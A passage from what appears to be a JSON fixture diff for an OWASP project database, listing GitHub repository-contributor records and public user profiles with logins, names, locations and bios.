"2024-09-22T10:45:55.486Z", + "nest_updated_at": "2024-09-22T20:31:05.309Z", + "contributions_count": 102, + "repository": 1461, + "user": 3068 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11157, + "fields": { + "nest_created_at": "2024-09-22T10:45:55.799Z", + "nest_updated_at": "2024-09-22T20:31:05.640Z", + "contributions_count": 68, + "repository": 1461, + "user": 8613 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11158, + "fields": { + "nest_created_at": "2024-09-22T10:45:56.123Z", + "nest_updated_at": "2024-09-22T20:31:05.950Z", + "contributions_count": 43, + "repository": 1461, + "user": 8614 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11159, + "fields": { + "nest_created_at": "2024-09-22T10:45:56.445Z", + "nest_updated_at": "2024-09-22T20:31:06.294Z", + "contributions_count": 26, + "repository": 1461, + "user": 8615 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11160, + "fields": { + "nest_created_at": "2024-09-22T10:45:56.765Z", + "nest_updated_at": "2024-09-22T20:31:06.608Z", + "contributions_count": 14, + "repository": 1461, + "user": 8616 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11161, + "fields": { + "nest_created_at": "2024-09-22T10:45:57.120Z", + "nest_updated_at": "2024-09-22T20:31:06.947Z", + "contributions_count": 11, + "repository": 1461, + "user": 8617 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11162, + "fields": { + "nest_created_at": "2024-09-22T10:45:57.440Z", + "nest_updated_at": "2024-09-22T20:31:07.265Z", + "contributions_count": 8, + "repository": 1461, + "user": 8618 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11163, + "fields": { + "nest_created_at": "2024-09-22T10:45:57.799Z", + "nest_updated_at": "2024-09-22T20:31:07.578Z", + "contributions_count": 8, + "repository": 1461, + "user": 8619 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11164, + "fields": { + "nest_created_at": "2024-09-22T10:45:58.117Z", + "nest_updated_at": "2024-09-22T20:31:07.893Z", + "contributions_count": 7, + "repository": 1461, + "user": 8620 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11165, + "fields": { + "nest_created_at": "2024-09-22T10:45:58.427Z", + "nest_updated_at": "2024-09-22T20:31:08.214Z", + "contributions_count": 7, + "repository": 1461, + "user": 8621 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11166, + "fields": { + "nest_created_at": "2024-09-22T10:45:58.747Z", + "nest_updated_at": "2024-09-22T20:31:08.528Z", + "contributions_count": 6, + "repository": 1461, + "user": 8622 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11167, + "fields": { + "nest_created_at": "2024-09-22T10:45:59.062Z", + "nest_updated_at": "2024-09-22T20:31:08.843Z", + "contributions_count": 5, + "repository": 1461, + "user": 412 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11168, + "fields": { + "nest_created_at": "2024-09-22T10:45:59.386Z", + "nest_updated_at": "2024-09-22T20:31:09.163Z", + "contributions_count": 5, + "repository": 1461, + "user": 8623 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11169, + "fields": { + "nest_created_at": "2024-09-22T10:45:59.699Z", + "nest_updated_at": "2024-09-22T20:31:09.505Z", + "contributions_count": 4, + "repository": 1461, + "user": 8624 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11170, + "fields": { + "nest_created_at": "2024-09-22T10:46:00.027Z", + "nest_updated_at": "2024-09-22T20:31:09.834Z", + "contributions_count": 4, + "repository": 1461, + "user": 3045 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11171, + "fields": { + "nest_created_at": "2024-09-22T10:46:00.332Z", + "nest_updated_at": "2024-09-22T20:31:10.172Z", + "contributions_count": 3, + "repository": 1461, + "user": 8625 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11172, + "fields": { + "nest_created_at": "2024-09-22T10:46:00.648Z", + "nest_updated_at": "2024-09-22T20:31:10.523Z", + "contributions_count": 3, + "repository": 1461, + "user": 8626 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11173, + "fields": { + "nest_created_at": "2024-09-22T10:46:00.966Z", + "nest_updated_at": "2024-09-22T20:31:10.839Z", + "contributions_count": 3, + "repository": 1461, + "user": 4813 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11174, + "fields": { + "nest_created_at": "2024-09-22T10:46:01.311Z", + "nest_updated_at": "2024-09-22T20:31:11.154Z", + "contributions_count": 3, + "repository": 1461, + "user": 8627 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11175, + "fields": { + "nest_created_at": "2024-09-22T10:46:01.645Z", + "nest_updated_at": "2024-09-22T20:31:11.474Z", + "contributions_count": 3, + "repository": 1461, + "user": 6657 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11176, + "fields": { + "nest_created_at": "2024-09-22T10:46:01.959Z", + "nest_updated_at": "2024-09-22T20:31:11.783Z", + "contributions_count": 3, + "repository": 1461, + "user": 8628 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11177, + "fields": { + "nest_created_at": "2024-09-22T10:46:02.277Z", + "nest_updated_at": "2024-09-22T20:31:12.109Z", + "contributions_count": 3, + "repository": 1461, + "user": 8629 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11178, + "fields": { + "nest_created_at": "2024-09-22T10:46:02.692Z", + "nest_updated_at": "2024-09-22T20:31:12.436Z", + "contributions_count": 2, + "repository": 1461, + "user": 1759 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11179, + "fields": { + "nest_created_at": "2024-09-22T10:46:03.019Z", + "nest_updated_at": "2024-09-22T20:31:12.762Z", + "contributions_count": 2, + "repository": 1461, + "user": 8630 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11180, + "fields": { + "nest_created_at": "2024-09-22T10:46:03.330Z", + "nest_updated_at": "2024-09-22T20:31:13.075Z", + "contributions_count": 2, + "repository": 1461, + "user": 8631 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11181, + "fields": { + "nest_created_at": "2024-09-22T10:46:03.642Z", + "nest_updated_at": "2024-09-22T20:31:13.405Z", + "contributions_count": 2, + "repository": 1461, + "user": 8632 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11182, + "fields": { + "nest_created_at": "2024-09-22T10:46:03.955Z", + "nest_updated_at": "2024-09-22T20:31:13.735Z", + "contributions_count": 2, + "repository": 1461, + "user": 6158 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11183, + "fields": { + "nest_created_at": "2024-09-22T10:46:04.264Z", + "nest_updated_at": "2024-09-22T20:31:14.055Z", + "contributions_count": 2, + "repository": 1461, + "user": 8633 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11184, + "fields": { + "nest_created_at": "2024-09-22T10:46:04.581Z", + "nest_updated_at": "2024-09-22T20:31:14.399Z", + "contributions_count": 1, + "repository": 1461, + "user": 8634 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11185, + "fields": { + "nest_created_at": "2024-09-22T10:46:04.897Z", + "nest_updated_at": "2024-09-22T20:31:14.719Z", + "contributions_count": 1, + "repository": 1461, + "user": 8635 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11186, + "fields": { + "nest_created_at": "2024-09-22T10:46:05.216Z", + "nest_updated_at": "2024-09-22T20:31:15.028Z", + "contributions_count": 1, + "repository": 1461, + "user": 6073 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11187, + "fields": { + "nest_created_at": "2024-09-22T10:46:05.527Z", + "nest_updated_at": "2024-09-22T20:31:15.335Z", + "contributions_count": 1, + "repository": 1461, + "user": 8636 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11188, + "fields": { + "nest_created_at": "2024-09-22T10:46:05.885Z", + "nest_updated_at": "2024-09-22T20:31:15.659Z", + "contributions_count": 1, + "repository": 1461, + "user": 8637 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11189, + "fields": { + "nest_created_at": "2024-09-22T10:46:06.234Z", + "nest_updated_at": "2024-09-22T20:31:15.967Z", + "contributions_count": 1, + "repository": 1461, + "user": 3061 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11190, + "fields": { + "nest_created_at": "2024-09-22T10:46:06.555Z", + "nest_updated_at": "2024-09-22T20:31:16.288Z", + "contributions_count": 1, + "repository": 1461, + "user": 8638 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11191, + "fields": { + "nest_created_at": "2024-09-22T10:46:06.870Z", + "nest_updated_at": "2024-09-22T20:31:16.610Z", + "contributions_count": 1, + "repository": 1461, + "user": 8639 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11192, + "fields": { + "nest_created_at": "2024-09-22T10:46:07.191Z", + "nest_updated_at": "2024-09-22T20:31:16.932Z", + "contributions_count": 1, + "repository": 1461, + "user": 8640 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11193, + "fields": { + "nest_created_at": "2024-09-22T10:46:07.511Z", + "nest_updated_at": "2024-09-22T20:31:17.243Z", + "contributions_count": 1, + "repository": 1461, + "user": 8641 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11194, + "fields": { + "nest_created_at": "2024-09-22T10:46:07.823Z", + "nest_updated_at": "2024-09-22T20:31:17.561Z", + "contributions_count": 1, + "repository": 1461, + "user": 8642 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11195, + "fields": { + "nest_created_at": "2024-09-22T10:46:08.146Z", + "nest_updated_at": "2024-09-22T20:31:17.868Z", + "contributions_count": 1, + "repository": 1461, + "user": 8643 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11196, + "fields": { + "nest_created_at": "2024-09-22T10:46:08.462Z", + "nest_updated_at": "2024-09-22T20:31:18.192Z", + "contributions_count": 1, + "repository": 1461, + "user": 8644 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11197, + "fields": { + "nest_created_at": "2024-09-22T10:46:08.791Z", + "nest_updated_at": "2024-09-22T20:31:18.514Z", + "contributions_count": 1, + "repository": 1461, + "user": 8645 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11198, + "fields": { + "nest_created_at": "2024-09-22T10:46:09.115Z", + "nest_updated_at": "2024-09-22T20:31:18.836Z", + "contributions_count": 1, + "repository": 1461, + "user": 8646 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11199, + "fields": { + "nest_created_at": "2024-09-22T10:46:09.429Z", + "nest_updated_at": "2024-09-22T20:31:19.149Z", + "contributions_count": 1, + "repository": 1461, + "user": 8647 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11200, + "fields": { + "nest_created_at": "2024-09-22T10:46:09.782Z", + "nest_updated_at": "2024-09-22T20:31:19.463Z", + "contributions_count": 1, + "repository": 1461, + "user": 8648 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11201, + "fields": { + "nest_created_at": "2024-09-22T10:46:10.108Z", + "nest_updated_at": "2024-09-22T20:31:19.783Z", + "contributions_count": 1, + "repository": 1461, + "user": 3176 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11202, + "fields": { + "nest_created_at": "2024-09-22T10:46:10.464Z", + "nest_updated_at": "2024-09-22T20:31:20.089Z", + "contributions_count": 1, + "repository": 1461, + "user": 190 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11203, + "fields": { + "nest_created_at": "2024-09-22T10:46:10.780Z", + "nest_updated_at": "2024-09-22T20:31:20.393Z", + "contributions_count": 1, + "repository": 1461, + "user": 8649 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11204, + "fields": { + "nest_created_at": "2024-09-22T10:46:11.109Z", + "nest_updated_at": "2024-09-22T20:31:20.714Z", + "contributions_count": 1, + "repository": 1461, + "user": 8650 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11205, + "fields": { + "nest_created_at": "2024-09-22T10:46:11.444Z", + "nest_updated_at": "2024-09-22T20:31:21.025Z", + "contributions_count": 1, + "repository": 1461, + "user": 8651 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11206, + "fields": { + "nest_created_at": "2024-09-22T10:46:11.767Z", + "nest_updated_at": "2024-09-22T20:31:21.339Z", + "contributions_count": 1, + "repository": 1461, + "user": 5442 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11207, + "fields": { + "nest_created_at": "2024-09-22T10:46:12.074Z", + "nest_updated_at": "2024-09-22T20:31:21.651Z", + "contributions_count": 1, + "repository": 1461, + "user": 8652 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11208, + "fields": { + "nest_created_at": "2024-09-22T10:46:12.390Z", + "nest_updated_at": "2024-09-22T20:31:21.970Z", + "contributions_count": 1, + "repository": 1461, + "user": 8653 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11209, + "fields": { + "nest_created_at": "2024-09-22T10:46:12.724Z", + "nest_updated_at": "2024-09-22T20:31:22.296Z", + "contributions_count": 1, + "repository": 1461, + "user": 249 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11210, + "fields": { + "nest_created_at": "2024-09-22T10:46:13.045Z", + "nest_updated_at": "2024-09-22T20:31:22.613Z", + "contributions_count": 1, + "repository": 1461, + "user": 8654 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11211, + "fields": { + "nest_created_at": "2024-09-22T10:46:13.357Z", + "nest_updated_at": "2024-09-22T20:31:22.922Z", + "contributions_count": 1, + "repository": 1461, + "user": 8655 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11212, + "fields": { + "nest_created_at": "2024-09-22T10:46:13.678Z", + "nest_updated_at": "2024-09-22T20:31:23.238Z", + "contributions_count": 1, + "repository": 1461, + "user": 6330 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11213, + "fields": { + "nest_created_at": "2024-09-22T10:46:14.002Z", + "nest_updated_at": "2024-09-22T20:31:23.544Z", + "contributions_count": 1, + "repository": 1461, + "user": 8656 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11214, + "fields": { + "nest_created_at": "2024-09-22T10:46:14.320Z", + "nest_updated_at": "2024-09-22T20:31:23.856Z", + "contributions_count": 1, + "repository": 1461, + "user": 8657 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11215, + "fields": { + "nest_created_at": "2024-09-22T10:46:14.675Z", + "nest_updated_at": "2024-09-22T20:31:24.168Z", + "contributions_count": 1, + "repository": 1461, + "user": 5222 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11216, + "fields": { + "nest_created_at": "2024-09-22T10:46:19.454Z", + "nest_updated_at": "2024-09-22T20:31:28.663Z", + "contributions_count": 38, + "repository": 1462, + "user": 3044 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11217, + "fields": { + "nest_created_at": "2024-09-22T10:46:24.432Z", + "nest_updated_at": "2024-09-22T20:31:33.556Z", + "contributions_count": 54, + "repository": 1463, + "user": 3044 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11218, + "fields": { + "nest_created_at": "2024-09-22T10:46:24.748Z", + "nest_updated_at": "2024-09-22T20:31:33.876Z", + "contributions_count": 19, + "repository": 1463, + "user": 3176 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11219, + "fields": { + "nest_created_at": "2024-09-22T10:46:25.073Z", + "nest_updated_at": "2024-09-22T20:31:34.193Z", + "contributions_count": 1, + "repository": 1463, + "user": 8622 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11220, + "fields": { + "nest_created_at": "2024-09-22T10:46:25.407Z", + "nest_updated_at": "2024-09-22T20:31:34.503Z", + "contributions_count": 1, + "repository": 1463, + "user": 8658 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11221, + "fields": { + "nest_created_at": "2024-09-22T10:46:25.716Z", + "nest_updated_at": "2024-09-22T20:31:34.816Z", + "contributions_count": 1, + "repository": 1463, + "user": 8659 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11222, + "fields": { + "nest_created_at": "2024-09-22T10:46:26.039Z", + "nest_updated_at": "2024-09-22T20:31:35.141Z", + "contributions_count": 1, + "repository": 1463, + "user": 8660 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11223, + "fields": { + "nest_created_at": "2024-09-22T10:46:30.061Z", + "nest_updated_at": "2024-09-22T20:31:39.141Z", + "contributions_count": 309, + "repository": 1464, + "user": 8661 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11224, + "fields": { + "nest_created_at": "2024-09-22T10:46:30.375Z", + "nest_updated_at": "2024-09-22T20:31:39.457Z", + "contributions_count": 4, + "repository": 1464, + "user": 8662 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11225, + "fields": { + "nest_created_at": "2024-09-22T10:46:30.736Z", + "nest_updated_at": "2024-09-22T20:31:39.775Z", + "contributions_count": 2, + "repository": 1464, + "user": 8663 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11226, + "fields": { + "nest_created_at": "2024-09-22T10:46:31.047Z", + "nest_updated_at": "2024-09-22T20:31:40.092Z", + "contributions_count": 2, + "repository": 1464, + "user": 8664 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11227, + "fields": { + "nest_created_at": "2024-09-22T10:46:31.357Z", + "nest_updated_at": "2024-09-22T20:31:40.401Z", + "contributions_count": 2, + "repository": 1464, + "user": 8665 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11228, + "fields": { + "nest_created_at": "2024-09-22T10:46:31.681Z", + "nest_updated_at": "2024-09-22T20:31:40.716Z", + "contributions_count": 1, + "repository": 1464, + "user": 8666 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11229, + "fields": { + "nest_created_at": "2024-09-22T10:46:32.022Z", + "nest_updated_at": "2024-09-22T20:31:41.026Z", + "contributions_count": 1, + "repository": 1464, + "user": 7316 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11230, + "fields": { + "nest_created_at": "2024-09-22T10:46:32.337Z", + "nest_updated_at": "2024-09-22T20:31:41.354Z", + "contributions_count": 1, + "repository": 1464, + "user": 8667 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11231, + "fields": { + "nest_created_at": "2024-09-22T10:46:32.651Z", + "nest_updated_at": "2024-09-22T20:31:41.676Z", + "contributions_count": 1, + "repository": 1464, + "user": 8668 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11232, + "fields": { + "nest_created_at": "2024-09-22T10:46:32.972Z", + "nest_updated_at": "2024-09-22T20:31:41.984Z", + "contributions_count": 1, + "repository": 1464, + "user": 8669 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11233, + "fields": { + "nest_created_at": "2024-09-22T10:46:33.281Z", + "nest_updated_at": "2024-09-22T20:31:42.298Z", + "contributions_count": 1, + "repository": 1464, + "user": 6296 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11234, + "fields": { + "nest_created_at": "2024-09-22T10:46:37.158Z", + "nest_updated_at": "2024-09-22T20:31:46.317Z", + "contributions_count": 66, + "repository": 1465, + "user": 8622 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11235, + "fields": { + "nest_created_at": "2024-09-22T10:46:37.469Z", + "nest_updated_at": "2024-09-22T20:31:46.639Z", + "contributions_count": 25, + "repository": 1465, + "user": 3044 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11236, + "fields": { + "nest_created_at": "2024-09-22T10:46:41.374Z", + "nest_updated_at": "2024-09-22T20:31:50.478Z", + "contributions_count": 1, + "repository": 1466, + "user": 3044 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11237, + "fields": { + "nest_created_at": "2024-09-22T10:46:46.032Z", + "nest_updated_at": "2024-09-22T20:31:55.106Z", + "contributions_count": 126, + "repository": 1467, + "user": 3044 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11238, + "fields": { + "nest_created_at": "2024-09-22T10:46:50.850Z", + "nest_updated_at": "2024-09-22T20:31:59.808Z", + "contributions_count": 45, + "repository": 1468, + "user": 3044 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11239, + "fields": { + "nest_created_at": "2024-09-22T10:46:51.158Z", + "nest_updated_at": "2024-09-22T20:32:00.160Z", + "contributions_count": 16, + "repository": 1468, + "user": 8622 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11240, + "fields": { + "nest_created_at": "2024-09-22T10:46:55.486Z", + "nest_updated_at": "2024-09-22T20:32:04.470Z", + "contributions_count": 22, + "repository": 1469, + "user": 3044 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11241, + "fields": { + "nest_created_at": "2024-09-22T10:46:55.803Z", + "nest_updated_at": "2024-09-22T20:32:04.780Z", + "contributions_count": 11, + "repository": 1469, + "user": 3176 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11242, + "fields": { + "nest_created_at": "2024-09-22T10:46:56.119Z", + "nest_updated_at": "2024-09-22T20:32:05.095Z", + "contributions_count": 2, + "repository": 1469, + "user": 8622 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11243, + "fields": { + "nest_created_at": "2024-09-22T10:46:56.442Z", + "nest_updated_at": "2024-09-22T20:32:05.412Z", + "contributions_count": 1, + "repository": 1469, + "user": 8670 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11244, + "fields": { + "nest_created_at": "2024-09-22T10:46:56.756Z", + "nest_updated_at": "2024-09-22T20:32:05.726Z", + "contributions_count": 1, + "repository": 1469, + "user": 8658 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11245, + "fields": { + "nest_created_at": "2024-09-22T10:46:57.119Z", + "nest_updated_at": "2024-09-22T20:32:06.035Z", + "contributions_count": 1, + "repository": 1469, + "user": 8671 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11246, + "fields": { + "nest_created_at": "2024-09-22T10:46:57.435Z", + "nest_updated_at": "2024-09-22T20:32:06.356Z", + "contributions_count": 1, + "repository": 1469, + "user": 8672 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 11247, + "fields": { + "nest_created_at": "2024-09-22T10:47:02.109Z", + "nest_updated_at": "2024-09-22T20:32:11.016Z", + "contributions_count": 183, + "repository": 1470, + "user": 3044 + } +}, +{ + "model": "github.user", + "pk": 1, + "fields": { + "nest_created_at": "2024-09-11T19:06:50.236Z", + "nest_updated_at": "2024-09-22T20:30:06.517Z", + "name": "OWASP", + "login": "OWASP", + "email": "admin@owasp.com", + "avatar_url": "https://avatars.githubusercontent.com/u/155815?v=4", + "company": "", + "location": "United States of America", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6359, + "public_gists_count": 0, + "public_repositories_count": 1202, + "created_at": "2009-11-20T06:56:22Z", + "updated_at": "2024-09-01T11:32:48Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjE1NTgxNQ==", + "bio": "The OWASP Foundation", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2, + "fields": { + "nest_created_at": "2024-09-11T19:06:59.690Z", + "nest_updated_at": "2024-09-22T15:26:33.933Z", + "name": "", + "login": "helsonqduarte", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56883727?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-10-22T15:06:30Z", + "updated_at": "2024-06-19T20:59:06Z", + "node_id": "MDQ6VXNlcjU2ODgzNzI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3, + "fields": { + "nest_created_at": "2024-09-11T19:10:10.582Z", + "nest_updated_at": "2024-09-22T15:44:23.981Z", + "name": "Matthew Flannery", + "login": "matthewflannery", + "email": "flannery.matt@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12246589?v=4", + "company": "Ayenem ", + "location": "Sydney, Australia", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 23, + "public_gists_count": 5, + "public_repositories_count": 44, + "created_at": "2015-05-05T05:14:43Z", + "updated_at": "2024-07-20T23:51:38Z", + "node_id": "MDQ6VXNlcjEyMjQ2NTg5", + "bio": "Founder of DevSecOps Sydney community!\r\n\r\nI've worked at some pretty cool places, like EY, Deloitte, Google and others. \r\n<3 Kubernetes, Python, JS & Go", + "is_hireable": false, + "twitter_username": "senditmatt" + } +}, +{ + "model": "github.user", + "pk": 4, + "fields": { + "nest_created_at": "2024-09-11T19:10:47.812Z", + "nest_updated_at": "2024-09-22T19:44:56.265Z", + "name": "DonnieBLT", + "login": "DonnieBLT", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/128622481?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2023-03-22T16:03:09Z", + "updated_at": "2024-08-09T02:07:48Z", + "node_id": "U_kgDOB6qfkQ", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 5, + "fields": { + "nest_created_at": "2024-09-11T19:10:51.789Z", + "nest_updated_at": "2024-09-22T15:30:26.478Z", + "name": "QuillAudits_Official", + "login": "quillaudits", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/114924378?v=4", + "company": "@QuillAudits", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-10-03T12:19:28Z", + "updated_at": "2024-07-22T21:24:47Z", + "node_id": "U_kgDOBtmbWg", + "bio": "Leading Smart Contract Audit Firm 🛡️\r\n\r\nCommitted to Blockchain security with our cutting-edge Web3 security solutions. \r\n", + "is_hireable": false, + "twitter_username": "quillaudits" + } +}, +{ + "model": "github.user", + "pk": 6, + "fields": { + "nest_created_at": "2024-09-11T19:11:25.787Z", + "nest_updated_at": "2024-09-22T15:31:00.504Z", + "name": "Dave Hanson", + "login": "JeffreyShran", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10995361?v=4", + "company": "", + "location": "Andoria", + "collaborators_count": 0, + "following_count": 245, + "followers_count": 21, + "public_gists_count": 16, + "public_repositories_count": 105, + "created_at": "2015-02-13T16:20:59Z", + "updated_at": "2024-08-08T14:51:11Z", + "node_id": "MDQ6VXNlcjEwOTk1MzYx", + "bio": "", + "is_hireable": false, + "twitter_username": "JeffreyShran" + } +}, +{ + "model": "github.user", + "pk": 7, + "fields": { + "nest_created_at": "2024-09-11T19:11:48.956Z", + "nest_updated_at": "2024-09-22T20:29:15.378Z", + "name": "Grant Ongers", + "login": "rewtd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6101839?v=4", + "company": "@ongers @secure-delivery @OWASP", + "location": "London", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 20, + "public_gists_count": 2, + "public_repositories_count": 75, + "created_at": "2013-12-04T05:33:20Z", + "updated_at": "2024-08-21T12:47:39Z", + "node_id": "MDQ6VXNlcjYxMDE4Mzk=", + "bio": "AppSec guy, hacker, husband and father. Security, process & logic. \r\n@DefCon goon, @bsideslv staff, @OWASP, @ongers, @Secure-Delivery & @0xC0FFEEL", + "is_hireable": false, + "twitter_username": "rewtd" + } +}, +{ + "model": "github.user", + "pk": 8, + "fields": { + "nest_created_at": "2024-09-11T19:13:28.566Z", + "nest_updated_at": "2024-09-22T15:33:06.731Z", + "name": "Noam Rathaus", + "login": "nrathaus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2032238?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 51, + "created_at": "2012-07-24T07:05:17Z", + "updated_at": "2024-09-22T11:29:44Z", + "node_id": "MDQ6VXNlcjIwMzIyMzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "nrathaus" + } +}, +{ + "model": "github.user", + "pk": 9, + "fields": { + "nest_created_at": "2024-09-11T19:13:29.407Z", + "nest_updated_at": "2024-09-22T15:33:06.408Z", + "name": "dmdhrumilmistry", + "login": "dmdhrumilmistry", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56185972?v=4", + "company": "@Browserstack", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 132, + "public_gists_count": 1, + "public_repositories_count": 63, + "created_at": "2019-10-05T06:32:26Z", + "updated_at": "2024-09-22T12:10:48Z", + "node_id": "MDQ6VXNlcjU2MTg1OTcy", + "bio": "Cyber Security \"Engine|Pentest|Research|Lead\"er", + "is_hireable": true, + "twitter_username": "dmdhrumilmistry" + } +}, +{ + "model": "github.user", + "pk": 10, + "fields": { + "nest_created_at": "2024-09-11T19:13:30.239Z", + "nest_updated_at": "2024-09-11T19:13:30.239Z", + "name": "", + "login": "henning410", + "email": "henning1.weise@web.de", + "avatar_url": "https://avatars.githubusercontent.com/u/44315209?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2018-10-20T09:21:35Z", + "updated_at": "2024-08-02T14:10:33Z", + "node_id": "MDQ6VXNlcjQ0MzE1MjA5", + "bio": "M.Sc. Applied Computer Science Student", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 11, + "fields": { + "nest_created_at": "2024-09-11T19:13:31.550Z", + "nest_updated_at": "2024-09-22T15:33:04.339Z", + "name": "", + "login": "jIgnoul", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/113015081?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-09-07T08:03:25Z", + "updated_at": "2024-08-21T13:50:37Z", + "node_id": "U_kgDOBrx5KQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 12, + "fields": { + "nest_created_at": 